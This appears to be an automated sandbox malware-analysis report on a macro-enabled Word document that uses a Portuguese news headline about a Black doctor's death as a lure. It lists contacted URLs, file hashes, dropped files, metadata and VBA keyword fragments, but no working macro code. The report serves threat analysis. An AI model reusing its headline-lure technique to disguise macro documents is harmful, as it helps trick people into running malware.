                                                                                            https://o365auditrealtimeingestion.manage.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                              		high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                		high
                                                                                                https://api.office.net8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                  		high
                                                                                                  https://incidents.diagnosticssdf.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                    		high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                    • 0%, Virustotal, Browse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                      		high
                                                                                                      https://entitlement.diagnostics.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                        		high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                            		high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                              		high
                                                                                                              https://templatelogging.office.com/client/log8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                		high
                                                                                                                https://outlook.office365.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                  		high
                                                                                                                  https://webshell.suite.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                    		high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                      		high
                                                                                                                      https://management.azure.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                        		high
                                                                                                                        https://ncus-000.contentsync.8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://login.windows.net/common/oauth2/authorize8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                          		high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://graph.windows.net/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                            		high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                              		high
                                                                                                                              https://devnull.onenote.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                		high
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://messaging.office.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://contentstorage.omex.office.net/addinclassifier/officeentities8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://augloop.office.com/v28CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://skyapi.live.net/Activity/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://dataservice.o365filtering.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://onedrive.live.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://directory.services.8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://login.windows-ppe.net/common/oauth2/authorize8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://loki.delve.office.com/api/v1/configuration/officewin32/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                      		high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      No contacted IP infos

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:334232
                                                                                                                                                      Start date:27.12.2020
                                                                                                                                                      Start time:09:04:15
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 8m 48s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:Medica negra morre covid-19 apos racismo.docm
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:39
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • GSI enabled (VBA)
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal68.expl.evad.winDOCM@1/8@0/0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .docm
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Unable to detect Microsoft Word
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WinStore.App.exe, RuntimeBroker.exe, Microsoft.Photos.exe, backgroundTaskHost.exe, ApplicationFrameHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.147.198.201, 52.109.76.68, 52.109.8.25, 52.109.12.23, 51.132.208.181, 104.79.90.110, 92.122.213.247, 92.122.213.194, 20.54.26.129, 2.20.142.210, 2.20.142.209, 51.104.139.180, 52.155.217.156, 104.79.89.181, 20.190.129.128, 20.190.129.2, 40.126.1.145, 20.190.129.133, 40.126.1.166, 20.190.129.24, 40.126.1.142, 20.190.129.19, 40.127.240.158, 51.124.78.146
                                                                                                                                                      • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, dub2.next.a.prd.aadg.trafficmanager.net, settingsfd-prod-weu1-endpoint.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      Errors:
                                                                                                                                                      • Corrupt sample or wrongly selected analyzer.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      No context

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8CE411D0-944A-475F-831C-DB1313AF15FE
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):130397
                                                                                                                                                      Entropy (8bit):5.3770089976764535
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:5cQceNgrA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:kmQ9DQW+zBX8P
                                                                                                                                                      MD5:2B6BDFA22720901B1294CC30233EB43D
                                                                                                                                                      SHA1:DA5F4AEDCC7CC82F08BE93C4BFE80866FF1D050C
                                                                                                                                                      SHA-256:A4A8EBAE629AE88DF47455C05B5F67F76969ED5FB844E9F82F225CE8D26C94C5
                                                                                                                                                      SHA-512:4F024F32982A16F9703285D6ACF44833F84A99094118B7EF283C5FB9ABB5D996A4433FC2D4E3EDDC52FF83906ABDB0D6FD6FEB0B31E423B994DC9DC34BB38CC8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-12-27T08:05:04">.. Build: 16.0.13616.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{207CA17B-38C7-4372-969B-EE496C79ABCB}.tmp
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):75264
                                                                                                                                                      Entropy (8bit):3.433192733594239
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:guuVtLM7L9ItLpIuaLx/jI5hLsWI2vLnYIncyfLCm2SIv6IEIQLxIBLZRLoLJ/Ih:IcyGm21TegT
                                                                                                                                                      MD5:8BBEA28E2D34003C75E1C68C9FC04ACF
                                                                                                                                                      SHA1:A69DA78644FF060DB1369EA13C1B3DC86F01036A
                                                                                                                                                      SHA-256:C69974291323AE9BD6FE47A9A3E7B792325C15B1D9CF3A8447CCE85297B94EBC
                                                                                                                                                      SHA-512:EC505E2B442079FAA15565ADE6617A8BDB9B396DF42423A14599D91C563E3943925B13B085BC2D2C6F70F037E7D1F520353902D8EF2FC66874BD308E33359DBF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ....................I.M.A.G.E.N.S. .O.M.I.T.I.D.A.S. .P.E.L.A. .M.I.D.I.A.,. .M.U.L.H.E.R. .N.E.G.R.A. .M.O.R.R.E. .A.P...S. .D.E.N.U.N.C.I.A.R. .A.T.E.N.D.I.M.E.N.T.O. .R.A.C.I.S.T.A. .E.M. .H.O.S.P.I.T.A.L.../...................................../......................./.I.m.a.g.e.n.s. .d.o. .m.o.m.e.n.t.o. .e.m. .q.u.e. .e.l.a. .e. .d.e.s.f.a.r...a.d.a.m.e.n.t.e. .a.f.a.s.t.a.d.a...................................../............................................................................................................................................................................................................................d............V..............................gd.i..l........... .......;...$..$.If......F.!v..h.#v...9:V....F...,..t........9.6.,.....5......99...../.............4......F.p............yt.,......d........gd.<^.l........... .......8...$..$.If......F.!v..h.#v...9:V....F...,..t........9.6.5......99...../.............4......F.p............yt.*......d........gd.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{2F45822A-FABF-400A-A337-13A874CB1859}.tmp
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{A1E40901-705B-4D6D-A1BC-B8A7F39EF540}.tmp
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1536
                                                                                                                                                      Entropy (8bit):1.3708412074519778
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:IiiiiiiiiiVeldI43lnl/bl//l/fl/9vvvvvvvvvvFl/l/lAqsDNjPl3lldHzlbZ:Iiiiiiiiii8l+4cc8++lwG3qm
                                                                                                                                                      MD5:69CEA85DF140789165FE4F0C571582D9
                                                                                                                                                      SHA1:1D0635CA95E20E9B293BB7D4E4CFD6C0BF2FD26A
                                                                                                                                                      SHA-256:2933EF0D88431B8EDD4B44DBAF552CD21A2968B53F59BDB357BAF1769F0BE8B2
                                                                                                                                                      SHA-512:D59CCD27EF5CE1534080269A0835F8F6FD2A5E63A44936C0A28F5297727AB3070B61960BDCA7FAA1993C8FA12D7FA21B2EED5285BD47893775AE977EB0F72512
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ..(...(...(...(...(...(...(...(...(...(...(...p.r.a.t.e.s.h...p....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......>...B...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Medica negra morre covid-19 apos racismo.docm.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Sun Dec 27 16:05:04 2020, atime=Sun Dec 27 16:05:01 2020, length=100152, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2430
                                                                                                                                                      Entropy (8bit):4.70467662193963
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8DglvHshnq+y/AuLXk1q+y5Duz7aB6myDglvHshnq+y/AuLXk1q+y5Duz7aB6m:8UmhlvubctqB6pUmhlvubctqB6
                                                                                                                                                      MD5:FD7AA0F26501A4C61D9D978AE8CAA267
                                                                                                                                                      SHA1:A04F05CE5DF6323A626821437CDE3827F5A471A4
                                                                                                                                                      SHA-256:DF62D7E39517841C1E83F590901D38CB347676944E342FC812F2A6B9C6A4847B
                                                                                                                                                      SHA-512:E7F762DB2BF2CE70B792C5261257DBC242FA93CE1B1A2DF39DC26B5F17458B737641EDCA5449CE506F346EA43B35F408320E536139B32E837DD378CDEC8EFC46
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...(.Z.:...R..kr....y.jr...8............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Q......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny..Q.......S......................t.h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny..Q.......Y..............>.......|.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.8....Q.. .MEDICA~1.DOC.........>Qux.Q......h.....................H...M.e.d.i.c.a. .n.e.g.r.a. .m.o.r.r.e. .c.o.v.i.d.-.1.9. . .a.p.o.s. .r.a.c.i.s.m.o...d.o.c.m.......t...............-.......s...........>.S......C:\Users\user\Desktop\Medica negra morre covid-19 apos racismo.docm..E.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.e.d.i.c.a. .n.e.g.r.a. .m.o.r.r.e. .c.o.v.i.d.-.1.9. . .a.p.o.s. .r.a.c.i.s.m.o...d.o.c.m.........:..,.LB.)...As...`.......X.......724536...........!a..%.H.VZAj...i..-.........-..!a..%.H.VZAj...i..-.........-
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):178
                                                                                                                                                      Entropy (8bit):4.471728841059029
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:HjkMFXEZgbMgWFfMWkLprSwAoXEZgbMgWFfMWkLprSmxWjkMFXEZgbMgWFfMWkL2:HjFFaTFfMWkdFaTFfMWkdyFFaTFfMWkC
                                                                                                                                                      MD5:D17AB8486BA359FD7B7708FD8BC3F7FA
                                                                                                                                                      SHA1:4AC6A13D5F58E3B58D04FC5CA7F6513AA99D8780
                                                                                                                                                      SHA-256:BA021FB8E3BAD1681FF21C74F9762EC78DFA041F1CF798DB628BE634631B017F
                                                                                                                                                      SHA-512:92D7939C9FB6E338F565CB715D9B05D605057F4112022B37FD88EA53A029C386988AAAAA1C5E3C206726D8D60ABE1912BDDBFB2A51DFAFED03395329CAF3804F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: [misc]..Medica negra morre covid-19 apos racismo.docm.LNK=0..Medica negra morre covid-19 apos racismo.docm.LNK=0..[misc]..Medica negra morre covid-19 apos racismo.docm.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.4350428487438656
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Rl/ZdRZXf6pKlpdqhREl9laqrl/t:RtZTx6klpoklBrll
                                                                                                                                                      MD5:59E3B68FC4E3C8E1C266A211D9A0C63D
                                                                                                                                                      SHA1:D872A6609D9284A29DC4BA216791046E80A6F5AF
                                                                                                                                                      SHA-256:7CA77933470BD96DCE341F7066440D8AC7EB273302448BDA2457863514E7551E
                                                                                                                                                      SHA-512:B66A638AD30E98AF10DF1BD4A992F8AF49178D7221350FB499B399F9729EEE9B4B82F13CE0C2C74F2C76F8DDA74343DA8DDF74DF75C8696E96EDF9B6889F169E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .pratesh................................................p.r.a.t.e.s.h.........S.-O............................W.QO./..x..t`..tP..t............+.UO.0..........H...
                                                                                                                                                      C:\Users\user\Desktop\~$dica negra morre covid-19 apos racismo.docm
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.4350428487438656
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Rl/ZdRZXf6pKlpdqhREl9laqrl/t:RtZTx6klpoklBrll
                                                                                                                                                      MD5:59E3B68FC4E3C8E1C266A211D9A0C63D
                                                                                                                                                      SHA1:D872A6609D9284A29DC4BA216791046E80A6F5AF
                                                                                                                                                      SHA-256:7CA77933470BD96DCE341F7066440D8AC7EB273302448BDA2457863514E7551E
                                                                                                                                                      SHA-512:B66A638AD30E98AF10DF1BD4A992F8AF49178D7221350FB499B399F9729EEE9B4B82F13CE0C2C74F2C76F8DDA74343DA8DDF74DF75C8696E96EDF9B6889F169E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .pratesh................................................p.r.a.t.e.s.h.........S.-O............................W.QO./..x..t`..tP..t............+.UO.0..........H...

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Word 2007+
                                                                                                                                                      Entropy (8bit):7.94116946391462
                                                                                                                                                      TrID:
                                                                                                                                                      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                                      • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                                      File name:Medica negra morre covid-19 apos racismo.docm
                                                                                                                                                      File size:107431
                                                                                                                                                      MD5:549943fa268b65fee546e7adda0f06ba
                                                                                                                                                      SHA1:0ffc18af6916d88bf456f32a2e85b85e56b6c109
                                                                                                                                                      SHA256:c221dc10d175c2f3fb8366ad3aada1cf06c74ad8483a4a67bf62a0702b41c6f5
                                                                                                                                                      SHA512:6114421c747413253cdae3125f9eaff9aa8111785eebcd0836e9c8b43abc47e3acf82112c007e0fdca41940605f6aecc66f322e5106af8b0ee189a22bd1428da
                                                                                                                                                      SSDEEP:3072:iPSJXeHaWtd2jmnXwTzxktQvdtOvlSHpN6:bQvymA3xkte0vlypN6
                                                                                                                                                      File Content Preview:PK..........!.f.E?............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74fcd0d2f692908c

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "/opt/package/joesandbox/database/analysis/334232/sample/Medica negra morre covid-19 apos racismo.docm"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:False
                                                                                                                                                      Application Name:unknown
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Title:
                                                                                                                                                      Subject:
                                                                                                                                                      Author:Orca
                                                                                                                                                      Keywords:
                                                                                                                                                      Template:Normal
                                                                                                                                                      Last Saved By:Neutral Shop
                                                                                                                                                      Revion Number:12
                                                                                                                                                      Total Edit Time:13
                                                                                                                                                      Create Time:2020-12-24T08:21:00Z
                                                                                                                                                      Last Saved Time:2020-12-27T04:32:00Z
                                                                                                                                                      Number of Pages:25
                                                                                                                                                      Number of Words:365
                                                                                                                                                      Number of Characters:1977
                                                                                                                                                      Creating Application:Microsoft Office Word
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Number of Lines:16
                                                                                                                                                      Number of Paragraphs:4
                                                                                                                                                      Thumbnail Scaling Desired:false
                                                                                                                                                      Company:
                                                                                                                                                      Contains Dirty Links:false
                                                                                                                                                      Shared Document:false
                                                                                                                                                      Changed Hyperlinks:false
                                                                                                                                                      Application Version:16.0000

                                                                                                                                                      Streams with VBA

                                                                                                                                                      VBA File Name: ThisDocument.cls, Stream Size: 211789
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/ThisDocument
                                                                                                                                                      VBA File Name:ThisDocument.cls
                                                                                                                                                      Stream Size:211789
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . U f . . . . . . . . . . . ; . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . 8 . . N . t . . . p . . . . . . . . . I . . l . 0 . . K . . . . . . . . . . . . . . . . . . . . . . Z . . c 4 L . . . Q . { . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:01 16 01 00 01 00 01 00 00 c6 1d 00 00 e4 00 00 00 ea 01 00 00 ff ff ff ff cd 1d 00 00 55 66 02 00 00 00 00 00 01 00 00 00 aa 3b c6 45 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 db 3e a4 0a 38 f7 03 4e 9b 74 bd 89 8d 70 1e be a4 e4 03 bb ff bd fd 49 a8 c5 6c ac 30 96 e6 4b 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                      VBA Code Keywords

                                                                                                                                                      Keyword
                                                                                                                                                      "<html><head><meta
                                                                                                                                                      True)
                                                                                                                                                      Byte:
                                                                                                                                                      objItem.DSGlobalCatalogFlag
                                                                                                                                                      objSDUtil.Get("ntSecurityDescriptor")
                                                                                                                                                      img.CreateStickyNote("ageindays_"
                                                                                                                                                      Byte,
                                                                                                                                                      Byte)
                                                                                                                                                      "em"">"
                                                                                                                                                      "bars",
                                                                                                                                                      "Pool
                                                                                                                                                      https://en.wikipedia.org/wiki/Theodorus_of_Cyrene
                                                                                                                                                      "spiral.png",
                                                                                                                                                      Split(theText,
                                                                                                                                                      Object
